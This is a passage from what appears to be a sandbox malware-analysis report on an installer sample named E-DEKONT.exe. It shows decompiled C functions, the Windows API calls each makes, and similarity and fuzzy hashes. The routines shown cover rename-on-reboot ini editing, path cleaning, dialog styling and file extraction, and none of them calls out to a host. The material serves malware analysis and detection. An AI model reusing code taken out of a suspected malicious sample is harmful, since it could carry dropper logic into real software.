                                                                            				 *0x4308e8 = 0x55004e;
                                                                            				 *0x4308ec = 0x4c;
                                                                            				if(_t44 == 0) {
                                                                            					L3:
                                                                            					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x4310e8, 0x400);
                                                                            					if(_t12 != 0 && _t12 <= 0x400) {
                                                                            						_t37 = wsprintfA(0x4304e8, "%ls=%ls\r\n", 0x4308e8, 0x4310e8);
                                                                            						_t53 = _t52 + 0x10;
                                                                            						E004062A4(_t37, 0x400, 0x4310e8, 0x4310e8,  *((intOrPtr*)( *0x434ef4 + 0x128)));
                                                                            						_t12 = E00405D74(0x4310e8, 0xc0000000, 4);
                                                                            						_t48 = _t12;
                                                                            						 *(_t53 + 0x18) = _t48;
                                                                            						if(_t48 != 0xffffffff) {
                                                                            							_t42 = GetFileSize(_t48, 0);
                                                                            							_t6 = _t37 + 0xa; // 0xa
                                                                            							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                            							if(_t46 == 0 || E00405DF7(_t48, _t46, _t42) == 0) {
                                                                            								L18:
                                                                            								return CloseHandle(_t48);
                                                                            							} else {
                                                                            								if(E00405CD9(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                            									_t49 = E00405CD9(_t38, _t21 + 0xa, "\n[");
                                                                            									if(_t49 == 0) {
                                                                            										_t48 =  *(_t53 + 0x18);
                                                                            										L16:
                                                                            										_t24 = _t42;
                                                                            										L17:
                                                                            										E00405D2F(_t24 + _t46, 0x4304e8, _t37);
                                                                            										SetFilePointer(_t48, 0, 0, 0);
                                                                            										E00405E26(_t48, _t46, _t42 + _t37);
                                                                            										GlobalFree(_t46);
                                                                            										goto L18;
                                                                            									}
                                                                            									_t39 = _t46 + _t42;
                                                                            									_t31 = _t39 + _t37;
                                                                            									while(_t39 > _t49) {
                                                                            										 *_t31 =  *_t39;
                                                                            										_t31 = _t31 - 1;
                                                                            										_t39 = _t39 - 1;
                                                                            									}
                                                                            									_t24 = _t49 - _t46 + 1;
                                                                            									_t48 =  *(_t53 + 0x18);
                                                                            									goto L17;
                                                                            								}
                                                                            								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                            								_t42 = _t42 + 0xa;
                                                                            								goto L16;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            				} else {
                                                                            					CloseHandle(E00405D74(_t44, 0, 1));
                                                                            					_t12 = GetShortPathNameW(_t44, 0x4308e8, 0x400);
                                                                            					if(_t12 != 0 && _t12 <= 0x400) {
                                                                            						goto L3;
                                                                            					}
                                                                            				}
                                                                            				return _t12;
                                                                            			}




















                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406069,?,?), ref: 00405F09
                                                                            • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F12
                                                                              • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                                              • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                                            • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F2F
                                                                            • wsprintfA.USER32 ref: 00405F4D
                                                                            • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405F88
                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F97
                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                                            • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406025
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406036
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603D
                                                                              • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\E-DEKONT.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                                              • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                            • String ID: %ls=%ls$[Rename]
                                                                            • API String ID: 2171350718-461813615
                                                                            • Opcode ID: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
                                                                            • Instruction ID: 79e357045524b81a8ea21183b2a6189fe473d9766cb3db532b5e95eed637b89f
                                                                            • Opcode Fuzzy Hash: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
                                                                            • Instruction Fuzzy Hash: D1315771100B05ABD220AB669D48F6B3A9CDF45744F15003FF902F62D2EA7CD9118ABC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 91%
                                                                            			E00406516(WCHAR* _a4) {
                                                                            				short _t5;
                                                                            				short _t7;
                                                                            				WCHAR* _t19;
                                                                            				WCHAR* _t20;
                                                                            				WCHAR* _t21;
                                                                            
                                                                            				_t20 = _a4;
                                                                            				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                                            					_t20 =  &(_t20[4]);
                                                                            				}
                                                                            				if( *_t20 != 0 && E00405BCA(_t20) != 0) {
                                                                            					_t20 =  &(_t20[2]);
                                                                            				}
                                                                            				_t5 =  *_t20;
                                                                            				_t21 = _t20;
                                                                            				_t19 = _t20;
                                                                            				if(_t5 != 0) {
                                                                            					do {
                                                                            						if(_t5 > 0x1f &&  *((short*)(E00405B80(L"*?|<>/\":", _t5))) == 0) {
                                                                            							E00405D2F(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                                            							_t19 = CharNextW(_t19);
                                                                            						}
                                                                            						_t20 = CharNextW(_t20);
                                                                            						_t5 =  *_t20;
                                                                            					} while (_t5 != 0);
                                                                            				}
                                                                            				 *_t19 =  *_t19 & 0x00000000;
                                                                            				while(1) {
                                                                            					_push(_t19);
                                                                            					_push(_t21);
                                                                            					_t19 = CharPrevW();
                                                                            					_t7 =  *_t19;
                                                                            					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                            						break;
                                                                            					}
                                                                            					 *_t19 =  *_t19 & 0x00000000;
                                                                            					if(_t21 < _t19) {
                                                                            						continue;
                                                                            					}
                                                                            					break;
                                                                            				}
                                                                            				return _t7;
                                                                            			}









                                                                            APIs
                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\E-DEKONT.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75F63420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                                            • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\E-DEKONT.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75F63420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                                            • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\E-DEKONT.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75F63420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Char$Next$Prev
                                                                            • String ID: "C:\Users\user\Desktop\E-DEKONT.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 589700163-2702186785
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E0040427E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                            				struct tagLOGBRUSH _v16;
                                                                            				long _t35;
                                                                            				long _t37;
                                                                            				void* _t40;
                                                                            				long* _t49;
                                                                            
                                                                            				if(_a4 + 0xfffffecd > 5) {
                                                                            					L15:
                                                                            					return 0;
                                                                            				}
                                                                            				_t49 = GetWindowLongW(_a12, 0xffffffeb);
                                                                            				if(_t49 == 0) {
                                                                            					goto L15;
                                                                            				}
                                                                            				_t35 =  *_t49;
                                                                            				if((_t49[5] & 0x00000002) != 0) {
                                                                            					_t35 = GetSysColor(_t35);
                                                                            				}
                                                                            				if((_t49[5] & 0x00000001) != 0) {
                                                                            					SetTextColor(_a8, _t35);
                                                                            				}
                                                                            				SetBkMode(_a8, _t49[4]);
                                                                            				_t37 = _t49[1];
                                                                            				_v16.lbColor = _t37;
                                                                            				if((_t49[5] & 0x00000008) != 0) {
                                                                            					_t37 = GetSysColor(_t37);
                                                                            					_v16.lbColor = _t37;
                                                                            				}
                                                                            				if((_t49[5] & 0x00000004) != 0) {
                                                                            					SetBkColor(_a8, _t37);
                                                                            				}
                                                                            				if((_t49[5] & 0x00000010) != 0) {
                                                                            					_v16.lbStyle = _t49[2];
                                                                            					_t40 = _t49[3];
                                                                            					if(_t40 != 0) {
                                                                            						DeleteObject(_t40);
                                                                            					}
                                                                            					_t49[3] = CreateBrushIndirect( &_v16);
                                                                            				}
                                                                            				return _t49[3];
                                                                            			}









                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 0040429B
                                                                            • GetSysColor.USER32(00000000), ref: 004042B7
                                                                            • SetTextColor.GDI32(?,00000000), ref: 004042C3
                                                                            • SetBkMode.GDI32(?,?), ref: 004042CF
                                                                            • GetSysColor.USER32(?), ref: 004042E2
                                                                            • SetBkColor.GDI32(?,?), ref: 004042F2
                                                                            • DeleteObject.GDI32(?), ref: 0040430C
                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404316
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                            • String ID:
                                                                            • API String ID: 2320649405-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004052E6(signed int _a4, WCHAR* _a8) {
                                                                            				struct HWND__* _v8;
                                                                            				signed int _v12;
                                                                            				WCHAR* _v32;
                                                                            				long _v44;
                                                                            				int _v48;
                                                                            				void* _v52;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				WCHAR* _t27;
                                                                            				signed int _t28;
                                                                            				long _t29;
                                                                            				signed int _t37;
                                                                            				signed int _t38;
                                                                            
                                                                            				_t27 =  *0x433ec4;
                                                                            				_v8 = _t27;
                                                                            				if(_t27 != 0) {
                                                                            					_t37 =  *0x434fb4;
                                                                            					_v12 = _t37;
                                                                            					_t38 = _t37 & 0x00000001;
                                                                            					if(_t38 == 0) {
                                                                            						E004062A4(_t38, 0, 0x42c228, 0x42c228, _a4);
                                                                            					}
                                                                            					_t27 = lstrlenW(0x42c228);
                                                                            					_a4 = _t27;
                                                                            					if(_a8 == 0) {
                                                                            						L6:
                                                                            						if((_v12 & 0x00000004) == 0) {
                                                                            							_t27 = SetWindowTextW( *0x433ea8, 0x42c228);
                                                                            						}
                                                                            						if((_v12 & 0x00000002) == 0) {
                                                                            							_v32 = 0x42c228;
                                                                            							_v52 = 1;
                                                                            							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                                                                            							_v44 = 0;
                                                                            							_v48 = _t29 - _t38;
                                                                            							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                                                                            							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                                                                            						}
                                                                            						if(_t38 != 0) {
                                                                            							_t28 = _a4;
                                                                            							0x42c228[_t28] = 0;
                                                                            							return _t28;
                                                                            						}
                                                                            					} else {
                                                                            						_t27 = lstrlenW(_a8) + _a4;
                                                                            						if(_t27 < 0x1000) {
                                                                            							_t27 = lstrcatW(0x42c228, _a8);
                                                                            							goto L6;
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				return _t27;
                                                                            			}


















                                                                            APIs
                                                                            • lstrlenW.KERNEL32(0042C228,00000000,0041D800,75F623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                            • lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,75F623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                            • lstrcatW.KERNEL32(0042C228,0040325E), ref: 00405341
                                                                            • SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                            • String ID:
                                                                            • API String ID: 2531174081-0
                                                                            • Opcode ID: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
                                                                            • Instruction ID: 0b7e0c68d9dca976d3f5af37e2abe0e5b3dfc86658143eccbc3f009734cc3570
                                                                            • Opcode Fuzzy Hash: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
                                                                            • Instruction Fuzzy Hash: 3F21A171900518BACF11AFA5DD859CFBFB4EF85350F14817AF944B6290C7B98A90CFA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00404BB0(struct HWND__* _a4, intOrPtr _a8) {
                                                                            				long _v8;
                                                                            				signed char _v12;
                                                                            				unsigned int _v16;
                                                                            				void* _v20;
                                                                            				intOrPtr _v24;
                                                                            				long _v56;
                                                                            				void* _v60;
                                                                            				long _t15;
                                                                            				unsigned int _t19;
                                                                            				signed int _t25;
                                                                            				struct HWND__* _t28;
                                                                            
                                                                            				_t28 = _a4;
                                                                            				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                                            				if(_a8 == 0) {
                                                                            					L4:
                                                                            					_v56 = _t15;
                                                                            					_v60 = 4;
                                                                            					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                                            					return _v24;
                                                                            				}
                                                                            				_t19 = GetMessagePos();
                                                                            				_v16 = _t19 >> 0x10;
                                                                            				_v20 = _t19;
                                                                            				ScreenToClient(_t28,  &_v20);
                                                                            				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                                            				if((_v12 & 0x00000066) != 0) {
                                                                            					_t15 = _v8;
                                                                            					goto L4;
                                                                            				}
                                                                            				return _t25 | 0xffffffff;
                                                                            			}















                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BCB
                                                                            • GetMessagePos.USER32 ref: 00404BD3
                                                                            • ScreenToClient.USER32(?,?), ref: 00404BED
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFF
                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C25
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Send$ClientScreen
                                                                            • String ID: f
                                                                            • API String ID: 41195575-1993550816
                                                                            • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                            • Instruction ID: fcc096391eddebe8eb85a5aa76d4b30f922b4a39187f2a8acbab72006efdbce5
                                                                            • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                            • Instruction Fuzzy Hash: 31015E71900218BAEB10DB94DD85BFEBBBCAF95B11F10412BBA50B62D0D7B499418BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 73%
                                                                            			E00401DB3(intOrPtr __edx) {
                                                                            				void* __esi;
                                                                            				int _t9;
                                                                            				signed char _t15;
                                                                            				struct HFONT__* _t18;
                                                                            				intOrPtr _t30;
                                                                            				struct HDC__* _t31;
                                                                            				void* _t33;
                                                                            				void* _t35;
                                                                            
                                                                            				_t30 = __edx;
                                                                            				_t31 = GetDC( *(_t35 - 8));
                                                                            				_t9 = E00402C15(2);
                                                                            				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
                                                                            				0x40cdd8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                                                            				ReleaseDC( *(_t35 - 8), _t31);
                                                                            				 *0x40cde8 = E00402C15(3);
                                                                            				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                                                            				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
                                                                            				 *0x40cdef = 1;
                                                                            				 *0x40cdec = _t15 & 0x00000001;
                                                                            				 *0x40cded = _t15 & 0x00000002;
                                                                            				 *0x40cdee = _t15 & 0x00000004;
                                                                            				E004062A4(_t9, _t31, _t33, "Calibri",  *((intOrPtr*)(_t35 - 0x24)));
                                                                            				_t18 = CreateFontIndirectW(0x40cdd8);
                                                                            				_push(_t18);
                                                                            				_push(_t33);
                                                                            				E004061C9();
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                                            				return 0;
                                                                            			}












                                                                            APIs
                                                                            • GetDC.USER32(?), ref: 00401DB6
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                                            • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E38
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                            • String ID: Calibri
                                                                            • API String ID: 3808545654-1409258342
                                                                            • Opcode ID: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
                                                                            • Instruction ID: 8058adb7fc53f801c03006c9ef56a62efa99793a140a93f16ed6c143b7d909dc
                                                                            • Opcode Fuzzy Hash: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
                                                                            • Instruction Fuzzy Hash: 9A015271944240EFE701ABB4AE8A6D97FB49F95301F10457EE241F61E2CAB800459F2D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00402DD7(struct HWND__* _a4, intOrPtr _a8) {
                                                                            				short _v132;
                                                                            				int _t11;
                                                                            				int _t20;
                                                                            
                                                                            				if(_a8 == 0x110) {
                                                                            					SetTimer(_a4, 1, 0xfa, 0);
                                                                            					_a8 = 0x113;
                                                                            				}
                                                                            				if(_a8 == 0x113) {
                                                                            					_t20 =  *0x4169f8; // 0x4f892
                                                                            					_t11 =  *0x422a04; // 0x4f896
                                                                            					if(_t20 >= _t11) {
                                                                            						_t20 = _t11;
                                                                            					}
                                                                            					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                                            					SetWindowTextW(_a4,  &_v132);
                                                                            					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                                            				}
                                                                            				return 0;
                                                                            			}







                                                                            APIs
                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                                            • MulDiv.KERNEL32(0004F892,00000064,0004F896), ref: 00402E20
                                                                            • wsprintfW.USER32 ref: 00402E30
                                                                            • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                                            Strings
                                                                            • verifying installer: %d%%, xrefs: 00402E2A
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                            • String ID: verifying installer: %d%%
                                                                            • API String ID: 1451636040-82062127
                                                                            • Opcode ID: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                                            • Instruction ID: 0244175548504e0de7267acb57bf05e9e9b1595e8d7e84e5cb6d98a661a40fbb
                                                                            • Opcode Fuzzy Hash: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                                            • Instruction Fuzzy Hash: B6014470640208BBDF209F50DE49FAA3B69BB00304F008039FA46A51D0DBB889558B59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 76%
                                                                            			E100024A4(intOrPtr* _a4) {
                                                                            				intOrPtr _v4;
                                                                            				intOrPtr* _t24;
                                                                            				void* _t26;
                                                                            				intOrPtr _t27;
                                                                            				signed int _t35;
                                                                            				void* _t39;
                                                                            				intOrPtr _t40;
                                                                            				void* _t43;
                                                                            
                                                                            				_t39 = E1000121B();
                                                                            				_t24 = _a4;
                                                                            				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
                                                                            				_v4 = _t40;
                                                                            				_t43 = (_t40 + 0x81 << 5) + _t24;
                                                                            				do {
                                                                            					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
                                                                            					}
                                                                            					_t35 =  *(_t43 - 8);
                                                                            					if(_t35 <= 7) {
                                                                            						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B4))) {
                                                                            							case 0:
                                                                            								 *_t39 =  *_t39 & 0x00000000;
                                                                            								goto L15;
                                                                            							case 1:
                                                                            								_push( *__eax);
                                                                            								goto L13;
                                                                            							case 2:
                                                                            								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                                            								goto L14;
                                                                            							case 3:
                                                                            								__ecx =  *0x1000406c;
                                                                            								__edx = __ecx - 1;
                                                                            								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
                                                                            								__eax =  *0x1000406c;
                                                                            								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
                                                                            								goto L15;
                                                                            							case 4:
                                                                            								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
                                                                            								goto L15;
                                                                            							case 5:
                                                                            								_push( *0x1000406c);
                                                                            								_push(__edi);
                                                                            								_push( *__eax);
                                                                            								__imp__StringFromGUID2();
                                                                            								goto L15;
                                                                            							case 6:
                                                                            								_push( *__esi);
                                                                            								L13:
                                                                            								__eax = wsprintfW(__edi, __ebp);
                                                                            								L14:
                                                                            								__esp = __esp + 0xc;
                                                                            								goto L15;
                                                                            						}
                                                                            					}
                                                                            					L15:
                                                                            					_t26 =  *(_t43 + 0x14);
                                                                            					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                                            						GlobalFree(_t26);
                                                                            					}
                                                                            					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                                            					if(_t27 != 0) {
                                                                            						if(_t27 != 0xffffffff) {
                                                                            							if(_t27 > 0) {
                                                                            								E100012E1(_t27 - 1, _t39);
                                                                            								goto L24;
                                                                            							}
                                                                            						} else {
                                                                            							E10001272(_t39);
                                                                            							L24:
                                                                            						}
                                                                            					}
                                                                            					_v4 = _v4 - 1;
                                                                            					_t43 = _t43 - 0x20;
                                                                            				} while (_v4 >= 0);
                                                                            				return GlobalFree(_t39);
                                                                            			}












                                                                            APIs
                                                                              • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                            • GlobalFree.KERNEL32(?), ref: 1000256D
                                                                            • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108853027321.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000001.00000002.108852995308.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.108853063601.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.108853098522.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_10000000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 1780285237-0
                                                                            • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                            • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                                            • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                            • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
                                                                            			E004028A7(int __ebx) {
                                                                            				void* _t26;
                                                                            				long _t31;
                                                                            				int _t45;
                                                                            				void* _t49;
                                                                            				void* _t51;
                                                                            				void* _t54;
                                                                            				void* _t55;
                                                                            				void* _t56;
                                                                            
                                                                            				_t45 = __ebx;
                                                                            				 *((intOrPtr*)(_t56 - 0x30)) = 0xfffffd66;
                                                                            				_t50 = E00402C37(0xfffffff0);
                                                                            				 *(_t56 - 0x38) = _t23;
                                                                            				if(E00405BCA(_t50) == 0) {
                                                                            					E00402C37(0xffffffed);
                                                                            				}
                                                                            				E00405D4F(_t50);
                                                                            				_t26 = E00405D74(_t50, 0x40000000, 2);
                                                                            				 *(_t56 + 8) = _t26;
                                                                            				if(_t26 != 0xffffffff) {
                                                                            					_t31 =  *0x434ef8;
                                                                            					 *(_t56 - 0x3c) = _t31;
                                                                            					_t49 = GlobalAlloc(0x40, _t31);
                                                                            					if(_t49 != _t45) {
                                                                            						E0040332B(_t45);
                                                                            						E00403315(_t49,  *(_t56 - 0x3c));
                                                                            						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                                                                            						 *(_t56 - 0x4c) = _t54;
                                                                            						if(_t54 != _t45) {
                                                                            							E004030FA( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
                                                                            							while( *_t54 != _t45) {
                                                                            								_t47 =  *_t54;
                                                                            								_t55 = _t54 + 8;
                                                                            								 *(_t56 - 0x34) =  *_t54;
                                                                            								E00405D2F( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                                            								_t54 = _t55 +  *(_t56 - 0x34);
                                                                            							}
                                                                            							GlobalFree( *(_t56 - 0x4c));
                                                                            						}
                                                                            						E00405E26( *(_t56 + 8), _t49,  *(_t56 - 0x3c));
                                                                            						GlobalFree(_t49);
                                                                            						 *((intOrPtr*)(_t56 - 0x30)) = E004030FA(0xffffffff,  *(_t56 + 8), _t45, _t45);
                                                                            					}
                                                                            					CloseHandle( *(_t56 + 8));
                                                                            				}
                                                                            				_t51 = 0xfffffff3;
                                                                            				if( *((intOrPtr*)(_t56 - 0x30)) < _t45) {
                                                                            					_t51 = 0xffffffef;
                                                                            					DeleteFileW( *(_t56 - 0x38));
                                                                            					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                                            				}
                                                                            				_push(_t51);
                                                                            				E00401423();
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t56 - 4));
                                                                            				return 0;
                                                                            			}












                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
